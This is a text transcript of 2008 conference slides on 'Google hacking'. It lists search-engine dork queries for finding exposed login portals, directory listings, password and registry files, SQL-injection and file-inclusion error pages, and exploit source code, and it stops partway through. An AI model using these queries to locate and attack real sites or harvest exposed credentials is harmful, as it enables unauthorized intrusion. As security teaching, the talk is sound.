citec #con2-dirty attack with google hacking
TRANSCRIPT
![Page 1: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/1.jpg)
Dirty Attacks with Google Hacking
Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008
![Page 2: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/2.jpg)
What I’ve done ?!
Penetration Testing (BlackBox and WhiteBox)
Security Consultant ( I Hate this job !!)
Active Security Researcher
Devoted Hacker
Exploits and Vulnerabilities Disclosure (CWH Underground)
Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Bot (Developing) Etc..
Comments, Feedback ? >> [email protected] !
(Don’t spam mail !! lol)!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
-------------------------------- # w 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s
![Page 3: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/3.jpg)
What is Google Hacking ?!
It is NOT hacking into Google!! (Hacking Google: Sidejacking, XSS Spreadsheet, etc)
Google is much more than just a simple search interface and engine.
Google hacking is the use of a search engine to locate a security vulnerability on the Internet
Google crawls public websites for information using an automated search and record program called “Googlebot”.
IRC Bot using Google Hacking to find Vulnerability and Exploits
Refers to using the Google search engine in an effort to pull sensitive information, such as credit card numbers, out of a poorly constructed Web application !
Dirty Attacks
With
Google hacking
What is Google Hacking? What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
-------------------------------- Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 4: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/4.jpg)
What is Google Hacking ?!
Johnny Long is the “grandfather” of Google hacking. His website http://johnny.ihackstuff.com is exclusively
dedicated to Google Hacking and you will find all sorts of cool information there.
Johnny Long • Wrote Google Hacking for Penetration Testers; ISBN
1597491764
What is Google Hacking? What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
-------------------------------- Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
With
Google hacking
![Page 5: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/5.jpg)
What a Hacker Can do with Vulnerable Web ? !
When an attacker knows the sort of vulnerability he !
wants to exploit but has no specific target, The Best Solu-on is “Dirty Google Search operators”
File Inclusion (RFI, LFI) SQL Injection Remote Code Execution Arbitrary Add Admin Arbitrary File Upload XSS / XSRF Directory Listing Directory Traversal Source code disclosure Administrative Login Portals Web server Information Reveal Pathnames and Filenames Social Engineering (Damn !! How do you get my address)
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 6: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/6.jpg)
Google Hacking Database (GHDB) !
We call them “googledorks” : Inept or foolish people as revealed by Google.
Advisories and Vulnerabilities Error Messages that contain too much information Files containing usernames and passwords Footholds and juicy Info Pages containing login portals Pages containing network or vulnerability data Sensitive Directories Sensitive Online Shopping Info Vulnerable Files and Servers Web Server Detection
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 7: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/7.jpg)
Google Hacking Database (GHDB) !
h;p://johnny.ihackstuff.com/ghdb.php.
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 8: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/8.jpg)
Google Hacking Database (GHDB) !
Pages containing login portals
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 9: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/9.jpg)
Google Hacking Database (GHDB) !
in-tle:"ColdFusion Administrator Login"
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 10: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/10.jpg)
Google Hacking Database (GHDB) !
“ColdFusion Administrator Login"
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB) --------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 11: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/11.jpg)
Google Hacking basics!
Crawl Website Informa-on with Caches
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 12: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/12.jpg)
Google Hacking basics!
Using Google as a Proxy Server
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 13: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/13.jpg)
Google Hacking basics!
Basic Search Operators
Use the plus sign (+) to force a search for an overly common word
Use the minus sign (-) to exclude a term from a search
(|) / OR, admin | administrator To search for a phrase, supply the phrase
surrounded by double quotes (" ") A period (.) serves as a single-character wildcard. An asterisk (*) represents any word - not the
completion of a word, as is traditionally used Mixed searches, Can involve both phrases and
individual terms
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 14: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/14.jpg)
Google Advanced Operators!
Advanced Search Operators
filetype: info: define: intext: inurl: intitle: inanchor: link: site: stocks: cache:
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 15: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/15.jpg)
Google Advanced Operators!
Website Informa-on Gathering – “site:www.amazon.com” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 16: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/16.jpg)
Google Advanced Operators!
Subdomains Gathering – “site:amazon.com –site:www.amazon.com” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 17: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/17.jpg)
Google Advanced Operators!
Website containing Error Message – “Error | Warning site:…” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 18: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/18.jpg)
Google Advanced Operators!
Directory Lis-ng – in-tle:index.of admin !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 19: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/19.jpg)
Google Advanced Operators!
Directory Lis-ng – in-tle:index.of WS_FTP.LOG !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 20: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/20.jpg)
Google Advanced Operators!
Web server Informa-on – in-tle:index.of “Server at” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 21: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/21.jpg)
Google Advanced Operators!
Administra-ve Login Portals – “admin login” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 22: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/22.jpg)
Google Advanced Operators!
File robots.txt – “inurl:robots.txt” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 23: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/23.jpg)
Google Advanced Operators!
Vulnerable File (Robpoll.cgi) – “inurl:robpoll.cgi filetype:cgi” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 24: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/24.jpg)
Google Advanced Operators!
File containing password – “AutoCreate=TRUE password=*”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 25: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/25.jpg)
Google Advanced Operators!
MS Access DB password – “inurl:admin mdb”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 26: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/26.jpg)
Google Advanced Operators!
MS Access DB password – “inurl:admin mdb”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 27: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/27.jpg)
Google Advanced Operators!
Password File – “index of /etc" passwd !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 28: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/28.jpg)
Google Advanced Operators!
Crack / Keygen… – 94FBR sobware!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators --------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
![Page 29: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/29.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
Another way to locate exploit code is to focus on common strings within the source code itself
One way to do this is to focus on common inclusions or header file references
For Example, many C programs include the standard input/output library functions, which are references by an include statement such as #include <stdio.h> within the source code
A query like this would locate C source code that contained the word exploit, regardless of the file’s extension:
“#include <stdio.h>” exploit
![Page 30: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/30.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
![Page 31: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/31.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Exploits Via Common Code Strings
![Page 32: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/32.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Targets Via Demonstra-on Pages
Develop a query string to locate vulnerable targets on the Web; the vendor’s Website is a good place to discover what exactly the product’s Web pages look like
For Example, some administrators might modify the format of a vendor-supplied Web page to fit the theme of the site
These types of modifications can impact the effectiveness of a Google search that targets a vendor-supplied page format
You can find that most sites look very similar and that nearly every site has a “Powered by” message at the bottom of the main page
![Page 33: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/33.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Loca-ng Targets Via Source Code
A hacker might use the source code of a program to discover ways to search for that software with Google
To find the best search string to locate potentially vulnerable targets, you can visit the Web page of the software vendor to find the source code of the offending software
In case where source code is not available, an attacker might opt to simply download the offending software and run it on a machine he controls to get ideas for potential searches
![Page 34: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/34.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Vulnerable Web Applica-on Examples!
![Page 35: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/35.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Vulnerable Web Applica-on Examples!
![Page 36: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/36.jpg)
Locating Exploits and Finding Targets !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..
Dirty Attacks using Googlebot
Google Hacking Tools
--------------------------------
Finding targets via “powered by” – “Powered By cubecart”
![Page 37: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/37.jpg)
Tracking Down Web Servers, Log Portals, etc..!Query for “Microsob-‐IIS/5.0 Server at” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 38: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/38.jpg)
Tracking Down Web Servers, Log Portals, etc..!IIS HTTP/1.1 Error Page Titles !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 39: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/39.jpg)
Tracking Down Web Servers, Log Portals, etc..!Query for IIS 5.0 – intext:“404 Object Not Found” Microsob
IIS/5.0!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 40: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/40.jpg)
Tracking Down Web Servers, Log Portals, etc..!Query for “Apache” “Server at” –in-tle:index.of in-tle:error !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 41: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/41.jpg)
Tracking Down Web Servers, Log Portals, etc..!Apache 2.0 Error Pages!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 42: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/42.jpg)
Tracking Down Web Servers, Log Portals, etc..!Default Pages for Web Servers!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 43: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/43.jpg)
Tracking Down Web Servers, Log Portals, etc..!
Outlook Web Access Default Portal – inurl:“exchange/logon.asp”!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 44: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/44.jpg)
Tracking Down Web Servers, Log Portals, etc..!Windows Registry Entries Can Reveal Passwords – filetype:reg
intext:"internet account manager"!
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 45: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/45.jpg)
Tracking Down Web Servers, Log Portals, etc..!Error Message for File Inclusion – “Warning: Failed opening" !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 46: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/46.jpg)
Tracking Down Web Servers, Log Portals, etc..!Error Message for File Inclusion – “Warning: Failed opening" !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 47: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/47.jpg)
Tracking Down Web Servers, Log Portals, etc..!Error Message for SQL Injec-on – “Microsob OLE DB Provider
for ODBC Drivers error” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot
Google Hacking Tools --------------------------------
![Page 48: CITEC #CON2-Dirty Attack with Google Hacking](https://reader034.vdocuments.site/reader034/viewer/2022052618/5549e385b4c90512488b4998/html5/thumbnails/48.jpg)
Tracking Down Web Servers, Log Portals, etc..!Error Message for SQL Injec-on – “Microsob OLE DB Provider
for ODBC Drivers error” !
Dirty Attacks
With
Google hacking
What is Google Hacking?
What a Hacker Can do with vulnerable Web?
Google Hacking Database (GHDB)
--------------------------------
Google Hacking basics
Google Advanced Operators
--------------------------------
Locating Exploits and Finding Targets
